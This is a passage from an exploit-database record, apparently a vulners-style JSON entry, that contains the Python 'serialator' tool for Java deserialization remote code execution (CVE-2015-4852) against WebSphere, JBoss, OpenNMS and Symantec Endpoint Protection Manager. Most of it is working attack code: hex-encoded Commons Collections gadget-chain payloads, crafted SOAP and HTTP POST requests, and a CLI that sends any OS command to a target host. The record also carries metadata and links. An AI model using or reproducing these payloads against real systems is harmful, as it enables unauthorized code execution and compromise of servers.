d2 += '\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r

\r

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r

s.bind((HOST, PORT))\r

print(\"[i] Sending initial packets to OpenNMS RMI service\")\r

s.sendall(d1)\r

retdata = s.recv(8192)\r

if retdata:\r

#\r

# We have received some data suggesting the OpenNMS RMI Registry has responded.\r

# Time to exploit.\r

#\r

print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r

s.sendall(d2)\r

else:\r

print(\"[-] Sorry, the RMI service didnt respond. Revert to manual attack.\")\r

return 0\r

\r

def jboss_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the jboss_java_serialize.nasl script within Nessus \r

\"\"\"\r

This function sets up the attack payload for JBoss\r

\"\"\"\r

body_serObj = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\")\r

\r

cleng = len(_cmd)\r

body_serObj += chr(cleng) + _cmd\r

body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r

\"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r

\"Content-length\":\"%d\" % len(body_serObj)\r

}\r

resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r

\r

def websphere_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the websphere_java_serialize.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for IBM WebSphere\r

\"\"\"\r

serObj3 = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\") # Setup initial parts of the payload packet\r

cleng = len(_cmd) # Get the length of the payload\r

serObj3 += chr(cleng) + _cmd # Convert the length to byte string, prepend to the payload and concatenate with the serialised payload.\r

serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r

serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload\r

\r

body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r

<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r

<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r

</SOAP-ENV:Header>\r

<SOAP-ENV:Body>\r

<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r

<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r

<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r

<params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r

<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r

</ns1:invoke>\r

</SOAP-ENV:Body>\r

</SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r

\"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r

\"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r

\"Content-length\":\"%d\" % len(body)\r

}\r

print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r

resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r

\r

if __name__ == \"__main__\":\r

\r

#\r

# Main function\r

#\r

if not sys.version_info >= (3, 0):\r

sys,exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r

\r

# Setup command line arguments\r

cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v {version}\r

\r

Usage: python3 %(prog)s [options]\r

\r

Options:\r

-t Target (required)\r

-p Port (required)\r

-c CMD (required)\r

--serv Target Service (default: websphere)\r

--ssl Use SSL (default: OFF)\r

--test Test if target is vulnerable (default: OFF)\r

\"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r

cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r

cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r

cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r

cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r

cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for target service\")\r

cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r

\r

cmdargs = cmdparser.parse_args()\r

\r

if cmdargs.test:\r

answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r

if answ.lower() == 'y' or answ.lower() == 'yes':\r

print(\"[i] Awesome. Lets ask the target server to ping our system\")\r

tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r

if tgtos.lower == \"win\":\r

host_ip = input(\"[?] Provide LHOST: \")\r

print(\"[i] Windows target selected. Sending \\'ping -n 5 <attack_ip>'\\ to target.\")\r

cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r

else:\r

host_ip = input(\"[?] Provide LHOST: \")\r

print(\"[i] Unix target selected. Sending \\'ping -c 5 <attack_ip>'\\ to target.\")\r

cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r

else:\r

print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r

\r

if cmdargs.serv == \"websphere\":\r

print(\"[i] WebSphere selected as target app.\")\r

if cmdargs.test:\r

websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if cmdargs.cmd == None:\r

sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r

websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

elif cmdargs.serv == \"opennms\":\r

print(\"[i] OpenNMS selected as target app.\")\r

if cmdargs.test:\r

opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r

else:\r

if cmdargs.cmd == None:\r

sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r

opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r

elif cmdargs.serv == \"jboss\":\r

print(\"[i] JBoss selected as target app.\")\r

if cmdargs.test:\r

jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if cmdargs.cmd == None:\r

sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r

jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

print(\"[i] Symantec Endpoint selected as target app.\")\r

if cmdargs.test:\r

symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if cmdargs.cmd == None:\r

sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r

symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

\r

print(\"[i] Thank you for using this tool. Contact author for any comments.\")", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44552/"}], "zdt": [{"lastseen": "2018-04-30T02:13:36", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-04-29T00:00:00", "title": "Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2018-04-29T00:00:00", "id": "1337DAY-ID-30269", "href": "https://0day.today/exploit/description/30269", "sourceData": "#! /bin/bash/env python3\r

#\r

# ____ _ _ _ \r

# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

# ___) | __/ | | | (_| | | (_| | || (_) | | \r

# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

#\r

# By Nikhil Sreekumar (@roo7break)\r

# Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution\r

\r

import sys\r

import base64\r

import httplib2\r

import socket\r

import argparse\r

import socket\r

import os\r

import struct\r

import ctypes\r

\r

version = \"0.1\"\r

banner = \"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v %s\r

\r

\"\"\" % version\r

\r

def hex2raw3(teststr):\r

\"\"\"\r

This function takes a string (expecting hexstring) and returns byte string\r

\"\"\"\r

# From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r

bytes = []\r

teststr = ''.join( teststr.split(\" \") )\r

for i in range(0, len(teststr), 2):\r

bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r

return \"\".join(bytes)\r

\r

def symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for Symantec Endpoint\r

\"\"\"\r

\r

